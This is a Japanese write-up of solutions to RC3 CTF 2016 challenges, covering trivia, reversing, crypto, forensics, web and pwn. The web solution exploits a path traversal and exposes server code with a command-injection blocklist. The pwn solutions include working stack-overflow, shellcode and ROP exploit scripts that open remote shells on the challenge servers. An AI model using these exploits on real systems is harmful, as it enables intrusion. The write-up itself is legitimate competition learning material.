RC3 CTF 2016に参加。2940ptで54位。
What's your virus? (Trivia 20)
Horse from Tinbucktu (Trivia 30)
Love Bomb (Trivia 40)
Infringing memes (Trivia 50)
Logmein (Reversing 100)
import angr p = angr.Project('./logmein', load_options={'auto_load_libs': False}) s = p.factory.entry_state() initial_path = p.factory.path(s) pg = p.factory.path_group(initial_path) e = pg.explore(find=0x4007f0, avoid=0x4007c0) if len(e.found) > 0: s = e.found[0].state print "%r" % s.posix.dumps(0)
# python solve.py 'RC3-2016-XORISGUD\x00\x80\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01' # ./logmein Welcome to the RC3 secure password guesser. To continue, you must enter the correct password. Enter your guess: RC3-2016-XORISGUD You entered the correct password! Great job!
Who's a good boy? (Web 100)
/*here's a flag :)*/ flag:RC3-2016-CanineSS
Bork Bork (Web 300)
$ curl -v -d 'bork=' https://ctf.rc3.club:3100/bork (snip) < HTTP/1.0 200 OK < Content-Type: text/html; charset=utf-8 < Content-Length: 367 < Server: Werkzeug/0.11.11 Python/2.7.12 < Date: Sun, 20 Nov 2016 16:32:48 GMT < <!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="/static/bork.css"> <link rel="shortcut icon" href="/static/favicon.ico"> </head> <body> <h1>HERE'S YOUR BORK!!!!</h1> <iframe width="854" height="480" src="cat: borks/: Is a directory?autoplay=1&loop=1" frameborder="0"></iframe> </body> * STATE: PERFORM => DONE handle 0x6000579b0; line 1955 (connection #0) * multi_done * Closing connection 0 * The cache now contains 0 members * TLSv1.2 (OUT), TLS alert, Client hello (1): </html>
$ curl -d 'bork=../bork.py' https://ctf.rc3.club:3100/bork <!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="/static/bork.css"> <link rel="shortcut icon" href="/static/favicon.ico"> </head> <body> <h1>HERE'S YOUR BORK!!!!</h1> <iframe width="854" height="480" src="from flask import Flask, render_template, request, send_from_directory import os import commands import subprocess as sub app = Flask(__name__) #Select your bork @app.route('/', methods=['GET']) def index(): return render_template("index.html") @app.route('/favicon.ico', methods=['GET']) def favicon(): return send_from_directory(os.path.join(app.root_path, 'static'), 'favicon.ico') @app.route('/bork', methods=['POST']) def bork(): filename = request.form["bork"] print '"' + filename + '"' #had to remove / and .. because without that you can't get ../bork.txt badchars = [';', '>', '<', '|', '$', '`', '(', ')', "mv", "rm", "cp", "python", "perl", "ruby", "bash", "zsh", '~', '*', '-'] for bad in badchars: if bad in filename: print "found bad character" return render_template("sad.html") bork = commands.getstatusoutput('cat borks/' + filename) #so subprocess errors for some reason? literally ran the same script which is in /tmp/cmd.py. #that script works, but when run in flask it doesn't work? not sure why. #next time just use perl or php. they have great direct command line access which makes for #super easy command injection #cmdList = ['bin/sh', '-c', 'cat borks/' + filename] #p = sub.Popen(cmdList, stdout=sub.PIPE, stderr=sub.PIPE) #bork, errors = p.communicate() #should probably check errors #return render_template("bork.html", bork=bork) return render_template("bork.html", bork=bork[1]) if __name__ == "__main__": try: app.run(host='', port='9000') except Exception as e: print "Exception:" print e?autoplay=1&loop=1" frameborder="0"></iframe> </body> </html>
$ curl -d 'bork=../bork.txt' https://ctf.rc3.club:3100/bork <!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="/static/bork.css"> <link rel="shortcut icon" href="/static/favicon.ico"> </head> <body> <h1>HERE'S YOUR BORK!!!!</h1> <iframe width="854" height="480" src="RC3-2016-L057d0g3?autoplay=1&loop=1" frameborder="0"></iframe> </body> </html>
Salad (Crypto 100)
import string c = '7sj-ighm-742q3w4t' chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' for i in xrange(len(chars)): table = string.maketrans(chars, chars[i:] + chars[:i]) print c.translate(table)
$ python test.py 7sj-ighm-742q3w4t 8tk-jhin-853r4x5u 9ul-kijo-964s5y6v avm-ljkp-a75t6z7w (snip) Rc3-2016-ROMaNgOd (snip)
Calculus (Crypto 200)
微積分の書かれたGoogle Documentが与えられる。計算結果とHintから推測した。
200: There are no symbols in the flag
a n^2 t^3 i^4 2*d^5 e^6 r^7+r^5+r^4+r+1 v^8+v^7+v^4+v^2+9*v RC3-2016-antiderv
Cats (Crypto 300)
nums = [14, 9, 1, 20, 23, 15, 5, 13] chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' s = '' for n in nums: s += chars[n-1] print s
$ python test.py NIATWOEM
My Lil Droid (Forensics 100)
$ unzip youtube.apk $ cat build-data.properties build.target=blaze-out/intel-linux-android-4.8-libcxx-x86-opt/bin/java/com/google/android/gmscore/integ/client/1p_monolithic_raw_pre_munge_deploy.jar build.citc.snapshot=-1 build.verifiable=1 build.client=build-secure-info\:(SrcFS) main.class= build.label=gmscore_v3_RC21_SDK build.tool=Blaze, release blaze-2016.04.14-4 (mainline @119748905) build.client_mint_status=1 build.build_id=950d1ddb-9c1f-4bb8-b5b6-f3752bb22c0c build.gplatform=intel-linux-android-4.8-libcxx-x86 build.depot.path=//depot/branches/gmscore_apks_release_branch/120490875.2/google3 build.versionmap=map 120490875 default { // } import buildenv/9410; build.time=Tue May 31 15\:02\:21 2016 (1464732141) build.location=social-builder-pool-gmscore@voz22\:/google/src/files/123676479/depot/branches/gmscore_apks_release_branch/120490875.2/READONLY build.timestamp.as.int=1464732141 build.changelist.as.int=123676479 build.timestamp=1464732141 build.changelist=123676479 UkMz-2016-R09URU0yMQ== $ echo UkMz | base64 -d RC3 $ echo R09URU0yMQ== | base64 -d GOTEM21
Graphic Design (Forensics 200)
$ head forensics200.obj # Blender v2.78 (sub 0) OBJ File: '' # www.blender.org mtllib forensics200.mtl o def_not_the_flag_Text.002 v 2.131841 14.053224 -7.976235 v 1.879015 13.982867 -7.720026 v 1.927970 13.935733 -7.684662 v 2.078477 13.977615 -7.837183 v 2.147170 13.716490 -7.514853 v 2.407256 13.788866 -7.778421 $ grep '^o' forensics200.obj o def_not_the_flag_Text.002 o stegosaurus $ awk 'NR==1,/o stegosaurus/{print}' forensics200.obj >a.obj
これをMesh Viewerで表示してみると、flagが得られた。
Breaking News (Forensics 300)
$ \ls -1 -v Chapter0.zip Chapter1.zip Chapter2.zip Chapter3.zip Chapter4.zip Chapter5.zip Chapter6.zip Chapter7.zip Chapter8.zip Chapter9.zip Chapter10.zip Chapter11.zip Chapter12.zip Chapter13.zip Chapter14.zip Chapter15.zip Chapter16.zip Chapter17.zip Chapter18.zip Chapter19.zip $ \ls -1 -v | xargs -n1 strings | grep -v '.txt' GINg L+^= <U<i%[ GINg D{N1 !Rk\ ^hE3n GIKZo=f GIKZo=f UkMK \DjX pZzU NR!R9 K4r>& K)VH,JU( My0yMAo= MTYtRFUK ;X c `s; (yCc _/_PK Wow, these Queebloid folks do not fool around. H,Q/V( ,Q(NM 0gZ+ ?6(U Y*mO .Xt] 3oc$M8e S1lGCg== 2VD% 6[in ,QH,(HM,*V( QkxTCg== *Cut to black* $ echo UkMK | base64 -d RC $ echo My0yMAo= | base64 -d 3-20 $ echo MTYtRFUK | base64 -d 16-DU $ echo S1lGCg== | base64 -d KYF $ echo QkxTCg== | base64 -d BLS
Dirty Birdy (Forensics 400)
ディスクイメージが与えられる。FTK Imagerで開くとsecretfilesディレクトリがあるので、エクスポートする。
gitリポジトリの状態を見るとPGP秘密鍵が削除されていることがわかるので、git checkout
$ ls document.txt* README.md* Workbook1.xlsx.gpg* $ git status error: unable to open object pack directory: .git/objects/pack: Not a directory On branch master Your branch is up-to-date with 'origin/master'. Changes not staged for commit: (use "git add/rm <file>..." to update what will be committed) (use "git checkout -- <file>..." to discard changes in working directory) deleted: private.key Untracked files: (use "git add <file>..." to include in what will be committed) README.md Workbook1.xlsx.gpg document.txt no changes added to commit (use "git add" and/or "git commit -a") $ git checkout private.key error: unable to open object pack directory: .git/objects/pack: Not a directory $ cat private.key -----BEGIN PGP PRIVATE KEY BLOCK----- Version: GnuPG v1 (snip) -----END PGP PRIVATE KEY BLOCK----- $ file Workbook1.xlsx.gpg Workbook1.xlsx.gpg: PGP RSA encrypted session key - keyid: 1246B951 2DB12CE2 RSA (Encrypt or Sign) 1024b .
$ gpg --import private.key gpg: key 8FFDF6D6: secret key imported gpg: /home/user/.gnupg/trustdb.gpg: trustdb created gpg: key 8FFDF6D6: public key "ThugG (lolz) <nope@gmail.com>" imported gpg: Total number processed: 1 gpg: imported: 1 (RSA: 1) gpg: secret keys read: 1 gpg: secret keys imported: 1 $ gpg --output Workbook1.xlsx --decrypt Workbook1.xlsx.gpg gpg: encrypted with 1024-bit RSA key, ID E22CB12D, created 2016-11-18 "ThugG (lolz) <nope@gmail.com>" $ cat document.txt passowrd123
Fencepost (Pwn 150)
IDA Proで開いてアセンブリコードを読むと、[rbp+var_4]
.text:0000000000400823 ; =============== S U B R O U T I N E ======================================= .text:0000000000400823 .text:0000000000400823 ; Attributes: bp-based frame .text:0000000000400823 .text:0000000000400823 sub_400823 proc near ; DATA XREF: main+3Ao .text:0000000000400823 .text:0000000000400823 var_54 = dword ptr -54h .text:0000000000400823 s2 = byte ptr -50h .text:0000000000400823 var_48 = qword ptr -48h .text:0000000000400823 var_40 = dword ptr -40h .text:0000000000400823 var_3C = word ptr -3Ch .text:0000000000400823 s = byte ptr -30h .text:0000000000400823 var_4 = dword ptr -4 .text:0000000000400823 .text:0000000000400823 push rbp .text:0000000000400824 mov rbp, rsp .text:0000000000400827 sub rsp, 60h .text:000000000040082B mov [rbp+var_54], edi .text:000000000040082E mov [rbp+var_4], 0FFFFFFFFh .text:0000000000400835 mov rax, '-eht-ton' .text:000000000040083F mov qword ptr [rbp+s2], rax .text:0000000000400843 mov rax, 'sap-laer' .text:000000000040084D mov [rbp+var_48], rax .text:0000000000400851 mov [rbp+var_40], 'rows' .text:0000000000400858 mov [rbp+var_3C], 'd' .text:000000000040085E lea rdi, aWelcomeToTheRc ; "=== Welcome to the RC3 Secure CTF Login"... .text:0000000000400865 call _puts .text:000000000040086A lea rdi, aPleaseEnterThe ; "=== Please enter the correct password b"... .text:0000000000400871 call _puts .text:0000000000400876 .text:0000000000400876 loc_400876: ; CODE XREF: sub_400823+ACj .text:0000000000400876 lea rdi, format ; "Password: " .text:000000000040087D mov eax, 0 .text:0000000000400882 call _printf .text:0000000000400887 lea rax, [rbp+s] .text:000000000040088B mov rsi, rax .text:000000000040088E lea rdi, aS ; "%s" .text:0000000000400895 mov eax, 0 .text:000000000040089A call ___isoc99_scanf .text:000000000040089F lea rax, [rbp+s] .text:00000000004008A3 mov rdi, rax ; s .text:00000000004008A6 call _strlen .text:00000000004008AB add rax, 1 .text:00000000004008AF mov [rbp+rax+s], 0 .text:00000000004008B4 cmp [rbp+var_4], 0 .text:00000000004008B8 jz short loc_4008D1 .text:00000000004008BA lea rdx, [rbp+s2] .text:00000000004008BE lea rax, [rbp+s] .text:00000000004008C2 mov rsi, rdx ; s2 .text:00000000004008C5 mov rdi, rax ; s1 .text:00000000004008C8 call _strcmp .text:00000000004008CD test eax, eax .text:00000000004008CF jnz short loc_400876 .text:00000000004008D1 .text:00000000004008D1 loc_4008D1: ; CODE XREF: sub_400823+95j .text:00000000004008D1 cmp [rbp+var_4], 0 .text:00000000004008D5 jnz short locret_4008E1 .text:00000000004008D7 mov eax, 0 .text:00000000004008DC call sub_400810 .text:00000000004008E1 .text:00000000004008E1 locret_4008E1: ; CODE XREF: sub_400823+B2j .text:00000000004008E1 leave .text:00000000004008E2 retn .text:00000000004008E2 sub_400823 endp
$ perl -e 'print "\x00"x48 . "\n"' | nc 2091 === Welcome to the RC3 Secure CTF Login === === Please enter the correct password below === Password: RC3-2016-STACKPWN
IMS Easy (Pwn 150)
NX無効の32 bit ELF実行ファイルが与えられる。
$ file IMS-easy IMS-easy: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=9da37e8640249fe6a37b5020e1ac6c5beecfe7a7, not stripped $ readelf -a IMS-easy (snip) Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align LOAD 0x000000 0x08048000 0x08048000 0xa6150 0xa6150 R E 0x1000 LOAD 0x0a6f58 0x080eff58 0x080eff58 0x01028 0x023ac RW 0x1000 NOTE 0x0000f4 0x080480f4 0x080480f4 0x00044 0x00044 R 0x4 TLS 0x0a6f58 0x080eff58 0x080eff58 0x00010 0x00028 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10 GNU_RELRO 0x0a6f58 0x080eff58 0x080eff58 0x000a8 0x000a8 R 0x1 (snip)
アセンブリコードを読むと、インデックスの範囲チェックがされておらず、スタック上の任意のデータを読み書きできる脆弱性があることがわかる。 そこで、saved ebpを読み出し、リターンアドレスをスタック上に配置したシェルコードの先頭に書き換えるコードを書く。
from minipwn import * import re def add_record(s, _id, code): recvuntil(s, 'Choose: ') sendline(s, '1') recvuntil(s, 'Enter product ID: ') sendline(s, str(_id)) recvuntil(s, 'Enter product code: ') sendline(s, code) recvuntil(s, 'IMS\n') def delete_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '2') recvuntil(s, 'Enter index to delete: ') sendline(s, str(index)) recvuntil(s, 'IMS\n') def view_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '3') recvuntil(s, 'Enter the index of the product you wish to view: ') sendline(s, str(index)) data = recvuntil(s, 'There ')[:-6] recvuntil(s, 'IMS\n') return data def do_exit(s): recvuntil(s, 'Choose: ') sendline(s, '4') #s = connect_process(['./IMS-easy']) s = socket.create_connection(('ims.ctf.rc3.club', 7777)) # leak saved ebp data = view_record(s, 5) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: data = m.group(2) saved_ebp = u32(data[:4]) print "[+] saved_ebp = %x" % saved_ebp addr_buf = saved_ebp - 0xe0 print "[+] addr_buf = %x" % addr_buf # put shellcode on the stack sc = shellcode['x86'] print "[+] len(shellcode) = %d" % len(sc) add_record(s, u32(sc[8:12]), sc[:8]) add_record(s, u32(sc[20:].ljust(4)), sc[12:20]) add_record(s, 0, 'AAAABBBB') add_record(s, 0, 'AAAABBBB') add_record(s, 0, 'AAAABBBB') add_record(s, 0, 'AAAABBBB') # overwrite eip add_record(s, addr_buf, 'AAAABBBB') do_exit(s) interact(s)
$ python test.py [+] saved_ebp = ffba30cc [+] addr_buf = ffba2fec [+] len(shellcode) = 23 id uid=1002(IMS-easy) gid=1002(IMS-easy) groups=1002(IMS-easy) cat /home/IMS-easy/flag.txt RC3-2016-REC0RDZ-G0T-R3KT
IMS Hard (Pwn 400)
上の問題と同じ実行ファイルだが、NXとStack canaryが有効になっている。
$ file IMS-hard IMS-hard: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=bf20997cf9884ed329fc6d3bf91114c79b919868, not stripped $ readelf -a IMS-hard (snip) Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4 INTERP 0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08048000 0x08048000 0x00e74 0x00e74 R E 0x1000 LOAD 0x000eb0 0x08049eb0 0x08049eb0 0x00158 0x0019c RW 0x1000 DYNAMIC 0x000ebc 0x08049ebc 0x08049ebc 0x000f8 0x000f8 RW 0x4 NOTE 0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4 GNU_EH_FRAME 0x000d3c 0x08048d3c 0x08048d3c 0x0003c 0x0003c R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10 GNU_RELRO 0x000eb0 0x08049eb0 0x08049eb0 0x00150 0x00150 R 0x1 (snip) Relocation section '.rel.plt' at offset 0x438 contains 15 entries: Offset Info Type Sym.Value Sym. Name 08049fc0 00000107 R_386_JUMP_SLOT 00000000 setbuf@GLIBC_2.0 08049fc4 00000207 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0 08049fc8 00000307 R_386_JUMP_SLOT 00000000 fflush@GLIBC_2.0 08049fcc 00000407 R_386_JUMP_SLOT 00000000 memcpy@GLIBC_2.0 08049fd0 00000507 R_386_JUMP_SLOT 00000000 fgets@GLIBC_2.0 08049fd4 00000607 R_386_JUMP_SLOT 00000000 __stack_chk_fail@GLIBC_2.4 08049fd8 00000707 R_386_JUMP_SLOT 00000000 fwrite@GLIBC_2.0 08049fdc 00000807 R_386_JUMP_SLOT 00000000 puts@GLIBC_2.0 08049fe0 00000907 R_386_JUMP_SLOT 00000000 __gmon_start__ 08049fe4 00000a07 R_386_JUMP_SLOT 00000000 strtoul@GLIBC_2.0 08049fe8 00000b07 R_386_JUMP_SLOT 00000000 strchr@GLIBC_2.0 08049fec 00000c07 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0 08049ff0 00000d07 R_386_JUMP_SLOT 00000000 memset@GLIBC_2.0 08049ff4 00000e07 R_386_JUMP_SLOT 00000000 strncpy@GLIBC_2.0 08049ff8 00000f07 R_386_JUMP_SLOT 00000000 strtol@GLIBC_2.0 (snip)
400: There's a custom libc that is making your life harder :(
そこで、JIT-ROP(Dynamic ROP)を行うことにする。 スタックからstdoutのアドレス、stack canary、main関数からのリターンアドレス(__libc_start_main関数内を指すアドレス)を読み出し、fwrite関数でリターンアドレス以降のメモリを読み出すコードを書くと次のようになる。
from minipwn import * import re def add_record(s, _id, code): recvuntil(s, 'Choose: ') sendline(s, '1') recvuntil(s, 'Enter product ID: ') sendline(s, str(_id)) recvuntil(s, 'Enter product code: ') sendline(s, code) recvuntil(s, 'IMS\n') def delete_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '2') recvuntil(s, 'Enter index to delete: ') sendline(s, str(index)) recvuntil(s, 'IMS\n') def view_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '3') recvuntil(s, 'Enter the index of the product you wish to view: ') sendline(s, str(index)) data = recvuntil(s, 'There ')[:-6] recvuntil(s, 'IMS\n') return data def do_exit(s): recvuntil(s, 'Choose: ') sendline(s, '4') #s = connect_process(['./IMS-hard']) s = socket.create_connection(('ims.ctf.rc3.club', 8888)) # leak stdout data = view_record(s, -13) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: data = m.group(2) libc_stdout = u32(data[4:8]) print "[+] libc_stdout = %x" % libc_stdout # leak canary data = view_record(s, 5) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: canary = int(m.group(1)) print "[+] canary = %x" % canary # leak libc address data = view_record(s, 7) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: saved_ebp = int(m.group(1)) % 0x100000000 print "[+] saved_ebp = %x" % saved_ebp data = m.group(2) addr_libc = u32(data[:4]) print "[+] addr_libc = %x" % addr_libc # put canary on stack add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, canary, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') # overwrite eip plt_fwrite = 0x8048550 buf = p32(plt_fwrite) + 'AAAA' + p32(addr_libc) + p32(0x01010101) + p32(0x1) + p32(libc_stdout) add_record(s, u32(buf[8:12]), buf[:8]) add_record(s, u32(buf[20:24]), buf[12:20]) do_exit(s) print '[+] dump libc memory' f = open('dump.bin', 'wb') while True: data = s.recv(8192) if not data: break f.write(data) f.close() interact(s)
$ python test.py [+] libc_stdout = f775bac0 [+] canary = -4bdca00 [+] saved_ebp = ff8099d4 [+] addr_libc = f75cdad3 [+] dump libc memory *** Connection closed by remote host *** $ ls -al dump.bin -rw-r--r-- 1 user user 1639091 Nov 20 21:33 dump.bin
次に、読み出したメモリからexecve("/bin/sh", NULL, NULL)
from minipwn import * import re def add_record(s, _id, code): recvuntil(s, 'Choose: ') sendline(s, '1') recvuntil(s, 'Enter product ID: ') sendline(s, str(_id)) recvuntil(s, 'Enter product code: ') sendline(s, code) recvuntil(s, 'IMS\n') def delete_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '2') recvuntil(s, 'Enter index to delete: ') sendline(s, str(index)) recvuntil(s, 'IMS\n') def view_record(s, index): recvuntil(s, 'Choose: ') sendline(s, '3') recvuntil(s, 'Enter the index of the product you wish to view: ') sendline(s, str(index)) data = recvuntil(s, 'There ')[:-6] recvuntil(s, 'IMS\n') return data def do_exit(s): recvuntil(s, 'Choose: ') sendline(s, '4') #s = connect_process(['./IMS-hard']) s = socket.create_connection(('ims.ctf.rc3.club', 8888)) # leak canary data = view_record(s, 5) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: canary = int(m.group(1)) print "[+] canary = %x" % canary # leak libc address data = view_record(s, 7) m = re.search(r'Product ID: ([^,]*), Product Code: (.*)', data) if m: saved_ebp = int(m.group(1)) % 0x100000000 print "[+] saved_ebp = %x" % saved_ebp data = m.group(2) addr_libc = u32(data[:4]) print "[+] addr_libc = %x" % addr_libc # put canary on stack add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') add_record(s, canary, 'BBBBCCCC') add_record(s, 0x41414141, 'BBBBCCCC') # overwrite eip dump = open('dump.bin').read() addr_ret = 0x80484d2 offset_binsh = dump.index('/bin/sh\x00') offset_pop_eax = dump.index('\x58\xc3') offset_pop_ebx = dump.index('\x5b\xc3') offset_pop_ecx_edx = dump.index('\x59\x5a\xc3') offset_int80 = dump.index('\xcd\x80') print "[+] offset_binsh = %x" % offset_binsh print "[+] offset_pop_eax = %x" % offset_pop_eax print "[+] offset_pop_ebx = %x" % offset_pop_ebx print "[+] offset_pop_ecx_edx = %x" % offset_pop_ecx_edx print "[+] offset_int80 = %x" % offset_int80 buf = p32(addr_libc + offset_pop_eax) + p32(11) buf += p32(addr_libc + offset_pop_ebx) + p32(addr_libc + offset_binsh) buf += p32(addr_ret) buf += p32(addr_libc + offset_pop_ecx_edx) + p32(0) + p32(0) buf += p32(addr_libc + offset_int80) add_record(s, u32(buf[8:12]), buf[:8]) add_record(s, u32(buf[20:24]), buf[12:20]) add_record(s, u32(buf[32:36]), buf[24:32]) do_exit(s) print '[+] got a shell' interact(s)
$ python test2.py [+] canary = -15d07300 [+] saved_ebp = ff84df44 [+] addr_libc = f757ead3 [+] offset_binsh = 143fb9 [+] offset_pop_eax = ab55 [+] offset_pop_ebx = 10d [+] offset_pop_ecx_edx = 14748 [+] offset_int80 = 14a12 [+] got a shell id uid=1001(IMS-hard) gid=1001(IMS-hard) groups=1001(IMS-hard) cat /home/IMS-hard/flag.txt RC3-2016-SAVAGE-1337HAX-BRO
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